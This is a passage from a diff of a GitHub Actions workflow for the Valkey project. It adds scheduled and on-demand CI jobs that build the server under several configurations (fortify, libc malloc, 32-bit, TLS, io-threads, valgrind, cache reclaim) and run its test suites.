'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'fortify') + container: ubuntu:plucky + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + 
echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + apt-get update && apt-get install -y make gcc-13 git cmake g++ python3 + update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-13 100 + cd libbacktrace && ./configure && make && make install + - name: Install gtest + run: apt-get install -y pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests CC=gcc OPT=-O3 SERVER_CFLAGS='-Werror -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=3' USE_LIBBACKTRACE=yes + - name: testprep + run: apt-get install -y tcl8.6 tclx procps + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel 
${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + test-ubuntu-libc-malloc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'malloc') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + 
with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make MALLOC=libc SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-ubuntu-no-malloc-usable-size: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'malloc') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> 
$GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make MALLOC=libc CFLAGS=-DNO_MALLOC_USABLE_SIZE SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-ubuntu-32bit: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + 
(github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, '32bit') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + sudo apt-get update && sudo apt-get install libc6-dev-i386 g++-multilib + cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: | + sudo apt-get update + sudo apt-get install libgtest-dev + mkdir -p /tmp/gtest32 + cd /tmp/gtest32 + cmake -B build32 \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_C_FLAGS="-m32" \ + -DCMAKE_CXX_FLAGS="-m32" \ + -DCMAKE_EXE_LINKER_FLAGS="-m32" \ + /usr/src/googletest + cmake --build build32 --parallel + sudo cp build32/lib/*.a /usr/lib32/ + cd $GITHUB_WORKSPACE + - name: make + run: | + make 32bit 
SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes \ + GTEST_CFLAGS="-I/usr/src/googletest/googletest/include -I/usr/src/googletest/googlemock/include" \ + GTEST_LIBS="/usr/lib32/libgtest.a /usr/lib32/libgmock.a" + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + make -C tests/modules 32bit # the script below doesn't have an argument, we must build manually ahead of time + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 \ + GTEST_CFLAGS="-I/usr/src/googletest/googletest/include -I/usr/src/googletest/googlemock/include" \ + GTEST_LIBS="/usr/lib32/libgtest.a /usr/lib32/libgmock.a" + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + test-ubuntu-tls: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + 
(github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'tls') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make BUILD_TLS=yes SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get install tcl8.6 tclx tcl-tls + ./utils/gen-test-certs.sh + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs --tls ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs --tls ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && 
!contains(github.event.inputs.skiptests, 'sentinel') + run: | + ./runtest-sentinel --tls ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster --tls ${{github.event.inputs.cluster_test_args}} + test-ubuntu-tls-no-tls: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'tls') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make 
&& sudo make install + - name: make + run: make BUILD_TLS=yes SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get install tcl8.6 tclx tcl-tls + ./utils/gen-test-certs.sh + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: | + CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: | + ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + test-ubuntu-io-threads: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'iothreads') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: 
${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --io-threads --accurate --verbose --tags network --dump-logs ${{github.event.inputs.test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster --io-threads ${{github.event.inputs.cluster_test_args}} + test-ubuntu-tls-io-threads: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'tls') && !contains(github.event.inputs.skipjobs, 'iothreads') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 
'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make BUILD_TLS=yes SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get install tcl8.6 tclx tcl-tls + ./utils/gen-test-certs.sh + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: | + ./runtest --io-threads --tls --accurate --verbose --tags network --dump-logs ${{github.event.inputs.test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: | + ./runtest-cluster --io-threads --tls ${{github.event.inputs.cluster_test_args}} + test-ubuntu-reclaim-cache: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action 
!= 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'specific') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: "sudo apt-get install vmtouch\nmkdir /tmp/master \nmkdir /tmp/slave\n" + - name: warm up + run: | + ./src/valkey-server --daemonize yes --logfile /dev/null + ./src/valkey-benchmark -n 1 > /dev/null + ./src/valkey-cli save | grep OK > /dev/null + vmtouch -v ./dump.rdb > /dev/null + - name: test + run: | + echo "test SAVE doesn't increase cache" + CACHE0=$(grep -w file /sys/fs/cgroup/memory.stat | awk '{print $2}') + echo "$CACHE0" + ./src/valkey-server --daemonize yes --logfile /dev/null --dir /tmp/master --port 8080 --repl-diskless-sync no --pidfile /tmp/master/valkey.pid --rdbcompression no 
--enable-debug-command yes + sleep 1 # wait for server startup + ./src/valkey-cli -p 8080 debug populate 10000 k 102400 + ./src/valkey-server --daemonize yes --logfile /dev/null --dir /tmp/slave --port 8081 --repl-diskless-load disabled --rdbcompression no + sleep 1 # wait for server startup + ./src/valkey-cli -p 8080 save > /dev/null + VMOUT=$(vmtouch -v /tmp/master/dump.rdb) + echo $VMOUT + grep -q " 0%" <<< $VMOUT + CACHE=$(grep -w file /sys/fs/cgroup/memory.stat | awk '{print $2}') + echo "$CACHE" + if [ "$(( $CACHE-$CACHE0 ))" -gt "8000000" ]; then exit 1; fi + echo "test replication doesn't increase cache" + ./src/valkey-cli -p 8081 REPLICAOF 127.0.0.1 8080 > /dev/null + while [ $(./src/valkey-cli -p 8081 info replication | grep "master_link_status:down") ]; do sleep 1; done; + sleep 1 # wait for the completion of cache reclaim bio + VMOUT=$(vmtouch -v /tmp/master/dump.rdb) + echo $VMOUT + grep -q " 0%" <<< $VMOUT + VMOUT=$(vmtouch -v /tmp/slave/dump.rdb) + echo $VMOUT + grep -q " 0%" <<< $VMOUT + CACHE=$(grep -w file /sys/fs/cgroup/memory.stat | awk '{print $2}') + echo "$CACHE" + if [ "$(( $CACHE-$CACHE0 ))" -gt "8000000" ]; then exit 1; fi + + echo "test reboot doesn't increase cache" + PID=$(cat /tmp/master/valkey.pid) + kill -15 $PID + while [ -x /proc/${PID} ]; do sleep 1; done + ./src/valkey-server --daemonize yes --logfile /dev/null --dir /tmp/master --port 8080 + sleep 1 # wait for server startup + while [ $(./src/valkey-cli -p 8080 info persistence | grep "loading:1") ]; do sleep 1; done; + sleep 1 # wait for the completion of cache reclaim bio + VMOUT=$(vmtouch -v /tmp/master/dump.rdb) + echo $VMOUT + grep -q " 0%" <<< $VMOUT + CACHE=$(grep -w file /sys/fs/cgroup/memory.stat | awk '{print $2}') + echo "$CACHE" + if [ "$(( $CACHE-$CACHE0 ))" -gt "8000000" ]; then exit 1; fi + test-valgrind-test: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' 
&& github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'valgrind') && !contains(github.event.inputs.skiptests, 'valkey') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: make + run: make valgrind SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx valgrind -y + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest --valgrind --no-latency --verbose --clients 1 --timeout 2400 --dump-logs ${{github.event.inputs.test_args}} + test-valgrind-misc: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 
'valkey-io/valkey') || + (github.event_name == 'pull_request' && github.event.pull_request.base.ref != 'unstable' && github.event.action != 'labeled')) && + !contains(github.event.inputs.skipjobs, 'valgrind') && !(contains(github.event.inputs.skiptests, 'modules') && contains(github.event.inputs.skiptests, 'unittest')) + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make valgrind all-with-unit-tests SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: | + sudo apt-get update + sudo apt-get install tcl8.6 tclx valgrind -y + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --valgrind --no-latency --verbose --clients 1 --timeout 2400 --dump-logs ${{github.event.inputs.test_args}} + - name: unittest + if: 
